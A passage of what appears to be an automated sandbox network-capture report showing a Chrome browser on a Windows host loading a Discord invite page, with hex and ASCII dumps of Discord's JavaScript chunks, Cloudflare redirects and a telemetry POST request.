                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 37 66 66 61 0d 0a 5b 5b 33 33 36 33 30 32 30 39 38 37 2c 6e 75 6c 6c 2c 31 2c 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 31 34 30 35 38 33 31 39 35 35 2c 22 32 30 32 31 2d 30 36 5f 67 75 69 6c 64 5f 72 6f 6c 65 5f 73 75 62 73 63 72 69 70 74 69 6f 6e 73 22 2c 30 2c 5b 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 37 32 30 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 2c 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 34 37 35 30 7d 2c 7b 22 73 22 3a 34 37 35 30 2c 22 65 22 3a 35 32 30 30 7d 2c 7b 22 73 22 3a 35 32 30 30 2c 22 65 22 3a 35 37 30 30 7d 2c 7b 22 73 22 3a 35 37 30 30 2c 22 65 22 3a 36 32 30 30 7d 2c 7b 22 73 22 3a 36 32 30 30 2c 22 65 22 3a
                                                                          Data Ascii: 7ffa[[3363020987,null,1,[[[[1,[{"s":0,"e":10000}]]],[]]],[],[],null,null,0,0],[1405831955,"2021-06_guild_role_subscriptions",0,[[[[-1,[{"s":7200,"e":10000}]],[1,[{"s":0,"e":4750},{"s":4750,"e":5200},{"s":5200,"e":5700},{"s":5700,"e":6200},{"s":6200,"e":
                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 31 39 38 32 38 30 34 31 32 31 2c 31 30 30 30 30 5d 5d 5d 5d 5d 2c 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 43 4f 4d 4d 55 4e 49 54 59 22 5d 5d 5d 5d 5d 5d 2c 5b 5b 5b 2d 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 5d 2c 5b 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 31 36 30 34 36 31 32 30 34 35 2c 5b 5b 31 31 38 33 32 35 31 32 34 38 2c 5b 22 49 4e 54 45 52 4e 41 4c 5f 45 4d 50 4c 4f 59 45 45 5f 4f 4e 4c 59 22 2c 22 54 48 52 45 41 44 53 5f 4f 4e 4c 59 5f 43 48 41 4e 4e 45 4c 22 5d 5d 5d 5d 5d 5d 2c 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22
                                                                          Data Ascii: 1982804121,10000]]]]],[[[-1,[{"s":0,"e":10000}]]],[[1604612045,[[1183251248,["COMMUNITY"]]]]]],[[[-1,[{"s":0,"e":10000}]]],[]]],[],[[[[[1,[{"s":0,"e":10000}]]],[[1604612045,[[1183251248,["INTERNAL_EMPLOYEE_ONLY","THREADS_ONLY_CHANNEL"]]]]]],[[[1,[{"s":0,"
                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5b 34 31 34 38 37 34 35 35 32 33 2c 5b 5b 34 31 34 38 37 34 35 35 32 33 2c 5b 32 5d 5d 5d 5d 5d 5d 5d 2c 5b 7b 22 62 22 3a 31 2c 22 6b 22 3a 5b 22 38 38 32 36 38 30 36 36 30 35 38 38 39 30 34 34 34 38 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 30 5d 2c 5b 31 39 32 36 30 30 30 31 37 31 2c 6e 75 6c 6c 2c 30 2c 5b 5b 5b 5b 31 2c 5b 7b 22 73 22 3a 30 2c 22 65 22 3a 31 30 30 30 30 7d 5d 5d 5d 2c 5b 5d 5d 5d 2c 5b 7b 22 62 22 3a 30 2c 22 6b 22 3a 5b 22 32 31 31 35 34 36 38 31 36 31 35 30 32 34 31 32 38 22 5d 7d 2c 7b 22 62 22 3a 31 2c 22 6b 22 3a 5b 22 38 34 32 34 36 31 35 31 32 32 30 36 35 31 36 32 32 34 22 2c 22 38 38 32 36 38 30 36 36 30 35 38 38 39 30 34 34 34 38 22 5d 7d 5d 2c 5b 5d 2c 6e 75 6c 6c 2c 6e
                                                                          Data Ascii: :10000}]]],[[4148745523,[[4148745523,[2]]]]]]],[{"b":1,"k":["882680660588904448"]}],[],null,null,0,0],[1926000171,null,0,[[[[1,[{"s":0,"e":10000}]]],[]]],[{"b":0,"k":["21154681615024128"]},{"b":1,"k":["842461512206516224","882680660588904448"]}],[],null,n


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          328192.168.2.550064162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC860OUTGET /assets/8e64227ebe6f34850334.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:21 UTC964INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 31 38 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 30 64 61 35 64 33 31 65 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:21 GMTContent-Type: application/javascriptContent-Length: 2187Connection: closeCF-Ray: 8336f530da5d31ec-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:21 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 39 35 30 30 22 5d 2c 7b 35 37 33 30 35 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 67 65 74 53 65 6c 65 63 74 69 6f 6e 54 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 63 6f 6e 74 65 78 74 4d 65 6e 75 43 61 6c 6c 62 61 63 6b 4e 61 74 69 76 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 63 6f 6e 74 65 78 74 4d 65 6e 75 43 61 6c 6c 62 61 63 6b 57 65 62 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["39500"],{573055:function(e,t,n){"use strict";n.r(t),n.d(t,{getSelectionText:function(){return r},contextMenuCallbackNative:function(){return i},contextMenuCallbackWeb:function(){retur
                                                                          2023-12-10 16:45:21 UTC818INData Raw: 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 65 7d 3d 61 77 61 69 74 20 6e 2e 65 6c 28 22 33 39 39 37 35 38 22 29 2e 74 68 65 6e 28 6e 2e 62 69 6e 64 28 6e 2c 22 33 39 39 37 35 38 22 29 29 3b 72 65 74 75 72 6e 20 74 3d 3e 28 30 2c 6c 2e 6a 73 78 29 28 65 2c 7b 2e 2e 2e 74 2c 68 72 65 66 3a 72 2c 74 65 78 74 43 6f 6e 74 65 6e 74 3a 6f 7d 29 7d 29 3b 65 6c 73 65 20 69 66 28 6e 75 6c 6c 21 3d 74 26 26 22 22 21 3d 3d 74 29 72 65 74 75 72 6e 28 30 2c 75 2e 6f 70 65 6e 43 6f 6e 74 65 78 74 4d 65 6e 75 4c 61 7a 79 29 28 65 2c 61 73 79 6e 63 28 29 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 65 7d 3d 61 77 61 69 74 20 6e 2e 65 6c 28 22 36 32 32 36 31 38 22 29 2e 74 68 65 6e 28 6e 2e 62 69 6e 64 28 6e 2c 22 36 32 32 36 31 38 22 29 29 3b 72 65 74 75 72 6e 20 6e 3d
                                                                          Data Ascii: =>{let{default:e}=await n.el("399758").then(n.bind(n,"399758"));return t=>(0,l.jsx)(e,{...t,href:r,textContent:o})});else if(null!=t&&""!==t)return(0,u.openContextMenuLazy)(e,async()=>{let{default:e}=await n.el("622618").then(n.bind(n,"622618"));return n=


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          329192.168.2.550065162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC824OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:21 UTC768INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 31 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 62 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 35 36 64 33 30 36 33 62 2f 6d 61 69 6e 2e 6a 73 0d 0a 76 61 72 79 3a 20 61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 33 30 30 2c 20 70 75 62 6c 69 63 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77
                                                                          Data Ascii: HTTP/1.1 302 FoundDate: Sun, 10 Dec 2023 16:45:21 GMTTransfer-Encoding: chunkedConnection: closelocation: /cdn-cgi/challenge-platform/h/b/scripts/jsd/56d3063b/main.jsvary: accept-encodingcache-control: max-age=300, publicaccess-control-allow
                                                                          2023-12-10 16:45:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          330192.168.2.550068162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC860OUTGET /assets/09563300dbb31ab193bc.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:21 UTC965INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 32 33 61 61 63 64 61 61 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:21 GMTContent-Type: application/javascriptContent-Length: 164Connection: closeCF-Ray: 8336f5323aacdaa3-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:21 UTC164INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 35 37 35 36 22 5d 2c 7b 37 32 32 38 38 35 3a 66 75 6e 63 74 69 6f 6e 28 70 2c 63 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 70 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 31 35 35 35 31 63 36 63 39 64 34 64 31 61 39 36 62 61 37 36 2e 77 6f 66 66 32 22 7d 7d 5d 29 3b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["85756"],{722885:function(p,c,s){"use strict";p.exports=s.p+"15551c6c9d4d1a96ba76.woff2"}}]);


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          331192.168.2.550067162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC860OUTGET /assets/d8d8bb7602e34b57bbef.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:21 UTC1116INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 32 33 62 32 33 33 37 31 36 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:21 GMTContent-Type: application/javascriptContent-Length: 164Connection: closeCF-Ray: 8336f5323b233716-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:21 UTC164INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 32 34 33 35 22 5d 2c 7b 32 30 30 36 38 33 3a 66 75 6e 63 74 69 6f 6e 28 70 2c 63 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 70 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 33 66 34 36 62 62 65 63 62 34 32 38 37 63 30 61 38 32 39 66 2e 77 6f 66 66 32 22 7d 7d 5d 29 3b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["72435"],{200683:function(p,c,s){"use strict";p.exports=s.p+"3f46bbecb4287c0a829f.woff2"}}]);


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          332192.168.2.550066162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC860OUTGET /assets/3c723e3c991fcd7cce58.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
                                                                          2023-12-10 16:45:21 UTC1116INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 32 34 39 30 61 38 64 63 34 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:21 GMTContent-Type: application/javascriptContent-Length: 164Connection: closeCF-Ray: 8336f532490a8dc4-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.com
                                                                          2023-12-10 16:45:21 UTC164INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 36 30 37 37 22 5d 2c 7b 37 36 34 39 33 30 3a 66 75 6e 63 74 69 6f 6e 28 70 2c 73 2c 63 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 70 2e 65 78 70 6f 72 74 73 3d 63 2e 70 2b 22 36 31 39 31 62 32 65 63 64 34 38 38 37 33 62 65 64 37 37 33 2e 77 6f 66 66 32 22 7d 7d 5d 29 3b
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["26077"],{764930:function(p,s,c){"use strict";p.exports=c.p+"6191b2ecd48873bed773.woff2"}}]);


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          333192.168.2.550069162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:21 UTC1675OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 1024
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=U_gkOLloyb.ICan_vlR2v6ra22wHDBwo44Cwv3nPTwY-1702226719444-0-604800000
